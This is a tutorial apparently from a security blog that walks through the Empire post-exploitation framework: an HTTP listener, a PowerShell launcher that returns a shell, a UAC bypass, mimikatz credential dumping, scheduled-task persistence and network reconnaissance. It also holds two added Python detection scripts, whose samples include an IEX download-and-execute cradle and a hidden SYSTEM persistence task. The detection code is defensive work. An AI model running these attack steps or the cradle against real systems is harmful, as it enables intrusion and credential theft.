Post Exploitation: Empire

You may be able to learn how to exploit a system from a few articles, but if you don't know what to do after you have gained access, there is little point in the exploit itself. In this article I'll talk about an excellent post-exploitation framework called Empire.

Empire is a great post-exploitation tool with Python and PowerShell modules. Let's get to the examples without further ado.


Install it with:

apt install powershell-empire

Let's start by creating a listener.

The uselistener command selects the HTTP listener (the connection point the agents will call back to). You can check the listener's settings with the info command.

The listener is started with the execute command.

Now to the real point. The launcher powershell command generates a PowerShell one-liner; when we run it on the target system, we get a shell back.

The agents command shows the machines we are connected to; as you can see, running the code on the target gave us a session. The list command lists the agents, and the interact command connects to one of them. Notice the asterisk in front of the username: it means we have administrator privileges on the target machine.
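From the defender's side, the launcher one-liner described above is what shows up in process-creation telemetry (Windows event 4688 or Sysmon event 1). The following Python script is an added example, not code from the original post or from the Empire project: it scores a command line for the launcher's characteristic options (-noP -sta -w 1 -enc) and decodes the base64/UTF-16LE payload so the decoded script can be inspected for a download cradle. The sample command line and its decoded script are constructed for the example (the address is an RFC 5737 documentation address), and the indicator names are my own.

```python
import base64
import binascii
import re

# Indicator names are my own; the options they match are the ones Empire's
# default "launcher powershell" output uses (-noP -sta -w 1 -enc).
OPTION_INDICATORS = {
    "no_profile":      re.compile(r"(?:^|\s)-nop(?:rofile)?\b", re.I),
    "sta":             re.compile(r"(?:^|\s)-sta\b", re.I),
    "hidden_window":   re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I),
    "non_interactive": re.compile(r"(?:^|\s)-noni(?:nteractive)?\b", re.I),
}

# Tokens worth flagging once the encoded payload has been decoded.
DECODED_TOKENS = {
    "decoded_iex":             re.compile(r"\biex\b|invoke-expression", re.I),
    "decoded_download_cradle": re.compile(r"downloadstring|downloadfile|net\.webclient", re.I),
    "decoded_base64_layer":    re.compile(r"frombase64string", re.I),
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...),
# so the flag regex is built from every prefix rather than from the full name only.
_ENC_FLAG = re.compile(
    r"(?:^|\s)-e(?:c|" + "|".join("ncodedcommand"[:i] for i in range(1, 14))
    + r")?\s+([A-Za-z0-9+/=]+)",
    re.I,
)


def extract_encoded_payload(cmdline):
    """Return the decoded -EncodedCommand script (base64 of UTF-16LE text), or None."""
    match = _ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None  # not a well-formed encoded command; treat as not encoded


def analyze_command_line(cmdline):
    """Score a process-creation command line (e.g. from event 4688) for launcher traits."""
    indicators = [name for name, rx in OPTION_INDICATORS.items() if rx.search(cmdline)]
    decoded = extract_encoded_payload(cmdline)
    if decoded is not None:
        indicators.append("encoded_command")
        indicators += [name for name, rx in DECODED_TOKENS.items() if rx.search(decoded)]
    score = len(indicators)
    verdict = "suspicious" if score >= 3 else "review" if score == 2 else "likely benign"
    return {"decoded": decoded, "indicators": indicators, "score": score, "verdict": verdict}


# Constructed sample: a download cradle pointing at a documentation (RFC 5737) address,
# not a real stager. It is encoded the same way a launcher one-liner is.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/placeholder')"


def build_sample_command_line(script=SAMPLE_SCRIPT):
    """Wrap a script the way an encoded launcher one-liner is wrapped (constructed sample)."""
    encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell -noP -sta -w 1 -enc {encoded}"


if __name__ == "__main__":
    for line in (build_sample_command_line(),
                 'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Get-Date"'):
        result = analyze_command_line(line)
        print(result["verdict"], result["score"], result["indicators"])
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

The decoding step matters more than the option matching: attackers can drop -noP or -sta, but an encoded command still has to decode to the script that runs, so the decoded text is where a detection rule should look. Feed analyze_command_line the CommandLine field of each 4688 or Sysmon 1 event and alert on the "suspicious" verdict.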

After connecting to the target machine with the interact command, we check the agent's details with the info command: high_integrity is 1, which means we are running in a high-integrity (administrator) context.

What would we have to do if we weren’t an admin?

We can obtain administrator privileges with the bypassuac [listener name] command. Note that this is a UAC bypass, not a privilege escalation exploit: it only works when the current user is already a member of the local Administrators group but the agent is running at medium integrity.

Let's get the user passwords with the mimikatz command.

The creds command shows the harvested credentials in a more organized table.

We can also establish persistence on the target machine. The persistence/elevated/schtasks module does this with a scheduled task:

usemodule persistence/elevated/schtasks
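Scheduled-task persistence leaves a record in Windows Security event 4698 ("A scheduled task was created"), whose TaskContent field carries the full task XML. The following Python script is an added example, not from the post or from Empire: it parses that XML and scores the task for the traits a PowerShell persistence task typically has (hidden window, encoded or IEX'd script, a base64 layer, a payload read back from the registry, running as SYSTEM at logon). The two task definitions are constructed samples, the registry path in the first is a placeholder, and the indicator names are my own; the XML namespace is the Task Scheduler schema.

```python
import re
import xml.etree.ElementTree as ET

# Task Scheduler schema namespace used by the TaskContent XML in event 4698.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Indicator names are my own. They describe the shape of a PowerShell persistence action.
ARG_INDICATORS = {
    "hidden_window":           re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I),
    "encoded_command":         re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "iex":                     re.compile(r"\biex\b|invoke-expression", re.I),
    "base64_decode":           re.compile(r"frombase64string", re.I),
    "registry_stored_payload": re.compile(r"\b(?:gp|get-itemproperty)\b[^)]*\bhk(?:lm|cu):", re.I),
}
_POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.I)


def parse_task(xml_text):
    """Pull the fields that matter for triage out of a scheduled-task XML document."""
    root = ET.fromstring(xml_text)
    action = root.find("t:Actions/t:Exec", NS)
    return {
        "command":   action.findtext("t:Command", default="", namespaces=NS) if action is not None else "",
        "arguments": action.findtext("t:Arguments", default="", namespaces=NS) if action is not None else "",
        "user":      root.findtext("t:Principals/t:Principal/t:UserId", default="", namespaces=NS),
        "runlevel":  root.findtext("t:Principals/t:Principal/t:RunLevel", default="", namespaces=NS),
        "triggers":  [el.tag.split("}")[-1] for el in root.findall("t:Triggers/*", NS)],
    }


def assess_task(xml_text):
    """Score one 4698 TaskContent document; three or more indicators warrant a closer look."""
    task = parse_task(xml_text)
    indicators = []
    if _POWERSHELL.search(task["command"]):
        indicators.append("powershell_action")
        indicators += [name for name, rx in ARG_INDICATORS.items() if rx.search(task["arguments"])]
    if task["user"] == "S-1-5-18":  # LocalSystem
        indicators.append("runs_as_system")
    if task["runlevel"].lower() == "highestavailable":
        indicators.append("highest_runlevel")
    if {"LogonTrigger", "BootTrigger"} & set(task["triggers"]):
        indicators.append("logon_or_boot_trigger")
    score = len(indicators)
    return {"task": task, "indicators": indicators, "score": score,
            "verdict": "review" if score >= 3 else "likely benign"}


# Constructed sample of a persistence task: hidden PowerShell at logon, as SYSTEM,
# that decodes and runs a script stored under a placeholder registry key.
SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:Software\Placeholder\Key).Payload)))"</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed sample of an ordinary maintenance task for comparison.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-21-1000-2000-3000-1001</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
    <Arguments>-NoProfile -File C:\Scripts\cleanup.ps1</Arguments>
  </Exec></Actions>
</Task>"""


if __name__ == "__main__":
    for label, xml_text in (("suspicious", SUSPICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        result = assess_task(xml_text)
        print(label, result["verdict"], result["score"], result["indicators"])
```

Event 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled, so confirm that audit policy before relying on this; the same parser also works on the XML that Export-ScheduledTask returns if you sweep existing tasks rather than creation events.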

We can also scan the network the target machine sits on with the arpscan module:

usemodule situational_awareness/network/arpscan

As you can see, there is another machine on the network. We can also find the Domain Controller if we'd like; the PowerView module below lists the machines on which the current user has local administrator rights:

usemodule situational_awareness/network/powerview/find_localadmin_access

Good Luck!
